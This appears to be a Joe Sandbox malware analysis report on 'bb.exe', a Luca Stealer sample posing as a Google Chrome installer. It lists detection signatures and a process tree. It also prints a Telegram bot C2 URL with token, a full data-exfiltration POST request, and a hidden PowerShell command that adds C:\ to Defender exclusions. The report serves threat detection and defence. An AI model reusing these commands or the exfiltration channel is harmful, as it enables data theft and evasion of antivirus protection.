Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bb.exe

Overview

General Information

Sample Name:bb.exe
Analysis ID:1305316
MD5:0b61f6fcf7864a2f87d91e3a1eecf340
SHA1:104a099a866204117bad60c22a9ef35a8865a56a
SHA256:bbce6e4e32e181468d77eaf31f1d6929194ea3631977367fb6aa678d8f66344f
Tags:exesigned
Infos:

Detection

Luca Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Luca Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Uses the Telegram API (likely for C&C communication)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal ftp login credentials
Bypasses PowerShell execution policy
Suspicious powershell command line found
C2 URLs / IPs found in malware configuration
Adds extensions / path to Windows Defender exclusion list
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • bb.exe (PID: 6524 cmdline: C:\Users\user\Desktop\bb.exe MD5: 0B61F6FCF7864A2F87D91E3A1EECF340)
    • bb.exe (PID: 5040 cmdline: C:\Users\user\Desktop\bb.exe" /i "C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.msi" AI_EUIMSI=1 APPDIR="C:\Program Files\Google LLC\Google Chrome" SHORTCUTDIR="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" SECONDSEQUENCE="1" CLIENTPROCESSID="6524" CHAINERUIPROCESSID="6524Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_SETUPEXEPATH="C:\Users\user\Desktop\bb.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1694097598 " AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\bb.exe" TARGETDIR="C:\" AI_INSTALL="1 MD5: 0B61F6FCF7864A2F87D91E3A1EECF340)
  • msiexec.exe (PID: 6832 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 6948 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 39B2946DA8EA32E5CF40005A5AF4C9C3 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 4988 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 168A822027102CE8D563A5F7F2223835 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 1816 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\pssD8.ps1" -manufacturer "Google LLC" -pass "aicD7.pfx" -pfxPath "C:\Users\user~1\AppData\Local\Temp\aicD7.pfx" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • setup.exe (PID: 912 cmdline: C:\Program Files\Google LLC\Google Chrome\setup.exe MD5: BBB9D1514179EFCC7E990CE9367EC2C3)
      • powershell.exe (PID: 2572 cmdline: "powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\ MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6632 cmdline: powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Luca Stealer

{"C2 url": "https://api.telegram.org/bot6309284469:AAFeRYflNDLxPEOCUiJVtoraS_FZTAABfwg"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files\Google LLC\Google Chrome\setup.exeJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000000.275348795.00007FF611186000.00000002.00000001.01000000.00000010.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
      0000000C.00000002.304112093.00007FF611186000.00000002.00000001.01000000.00000010.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        12.0.setup.exe.7ff610e90000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
          12.2.setup.exe.7ff610e90000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 12.0.setup.exe.7ff610e90000.0.unpackMalware Configuration Extractor: Luca Stealer {"C2 url": "https://api.telegram.org/bot6309284469:AAFeRYflNDLxPEOCUiJVtoraS_FZTAABfwg"}
            Multi AV Scanner detection for submitted file
            Source: bb.exeReversingLabs: Detection: 13%
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeReversingLabs: Detection: 21%
            Source: bb.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 108.181.47.111:443 -> 192.168.2.7:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49732 version: TLS 1.2
            Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Google LLCJump to behavior
            Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Google LLC\Google ChromeJump to behavior
            Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Google LLC\Google Chrome\setup.exeJump to behavior
            Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome 116.0.596.10Jump to behavior
            Source: bb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: wininet.pdb source: bb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wininet.pdbUGP source: bb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: bb.exe, 00000000.00000000.208820822.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp, bb.exe, 00000000.00000002.327791244.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp, bb.exe, 00000004.00000000.251101197.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp, bb.exe, 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmp
            Source: C:\Users\user\Desktop\bb.exeFile opened: z:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: x:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: v:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: t:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: r:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: p:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: n:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: l:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: j:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: h:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: f:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: b:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: y:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: w:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: u:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: s:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: q:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: o:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: m:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: k:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: i:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: g:Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeFile opened: e:Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
            Source: C:\Users\user\Desktop\bb.exeFile opened: a:Jump to behavior

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://api.telegram.org/bot6309284469:AAFeRYflNDLxPEOCUiJVtoraS_FZTAABfwg
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1accept: */*host: ipwho.is
            Source: global trafficHTTP traffic detected: POST /bot6309284469:AAFeRYflNDLxPEOCUiJVtoraS_FZTAABfwg/sendDocument?chat_id=-1001826179816&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20191.101.61.19%0ACountry:%20United%20States%0ACity:%20Las%20Vegas%0APostal:%2089101%0AISP:%20Cogent%20Communications%20-%20A174%0ATimezone:%20-07:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20VLSU3BRF%20(1280,%201024)%0AHWID:%204573883483855036%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Program%20Files\Google%20LLC\Google%20Chrome\setup.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9D%8C%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=85897f56aee1e107-288ab59860bd3f6b-d74d75859e458c4f-4476a0ac9fbfa3e1content-length: 819905accept: */*host: api.telegram.org
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: bb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.css
            Source: bb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.jpg
            Source: bb.exe, 00000004.00000003.305263246.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253661100.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308217276.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.306726397.0000000003CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCe
            Source: bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308139604.0000000003C60000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: bb.exe, 00000000.00000003.319427932.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000002.327571664.000000000073F000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.319556795.000000000073B000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.307891180.0000000001253000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307164079.0000000001252000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: bb.exe, 00000000.00000003.319427932.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000002.327571664.000000000073F000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.319556795.000000000073B000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253661100.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.307836750.00000000011FC000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: bb.exe, 00000004.00000003.305263246.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308217276.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.306726397.0000000003CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.q?
            Source: bb.exe, 00000000.00000003.319427932.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000002.327571664.000000000073F000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.319556795.000000000073B000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.307836750.00000000011FC000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.268951828.0000000003127000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.271884123.000000000797B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.307836750.00000000011FC000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: bb.exe, 00000000.00000003.319427932.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000002.327571664.000000000073F000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.319556795.000000000073B000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253661100.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.307891180.0000000001253000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307164079.0000000001252000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: bb.exe, 00000000.00000003.319427932.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000002.327571664.000000000073F000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.319556795.000000000073B000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253661100.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.307836750.00000000011FC000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: bb.exe, bb.exe, 00000004.00000002.307836750.00000000011FC000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: powershell.exe, 00000008.00000002.271884123.00000000079B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en$
            Source: bb.exe, bb.exe, 00000004.00000002.307891180.0000000001253000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307164079.0000000001252000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: powershell.exe, 00000008.00000002.270935390.0000000007459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab9i3
            Source: bb.exe, 00000000.00000003.215029894.00000000007A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?66c8699caafe0
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: bb.exe, 00000000.00000003.216871030.00000000050E2000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253691994.00000000034B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
            Source: powershell.exe, 00000008.00000002.270361357.0000000006008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.305263246.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253661100.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308217276.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.306726397.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.307836750.00000000011FC000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308139604.0000000003C60000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: bb.exe, 00000000.00000003.319427932.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212758878.0000000000746000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.211353606.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000002.327571664.000000000073F000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.319556795.000000000073B000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.212047524.000000000071A000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.305263246.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253495412.0000000003CDE000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.253661100.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.254129717.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308217276.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.306726397.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.307891180.0000000001253000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307164079.0000000001252000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000002.308005883.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000004.00000003.307046983.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000008.00000002.269321572.0000000004FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: bb.exe, 00000000.00000003.225452513.0000000005893000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225426696.0000000005894000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225377345.0000000005891000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225401958.0000000005894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000008.00000002.269321572.00000000050D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: bb.exe, 00000000.00000003.225377345.0000000005891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-3
            Source: bb.exe, 00000000.00000003.225517012.0000000005893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: bb.exe, 00000000.00000003.225517012.0000000005893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comTC
            Source: bb.exe, 00000000.00000003.225517012.0000000005893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comftD
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: bb.exe, 00000000.00000003.225517012.0000000005893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn-u
            Source: bb.exe, 00000000.00000003.225401958.0000000005894000.00000004.00000020.00020000.00000000.sdmp, bb.exe, 00000000.00000003.225408789.000000000589C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comt
            Source: bb.exe, 00000000.00000003.324557038.0000000007732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: bb.exe, 00000000.00000003.227110877.00000000058B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
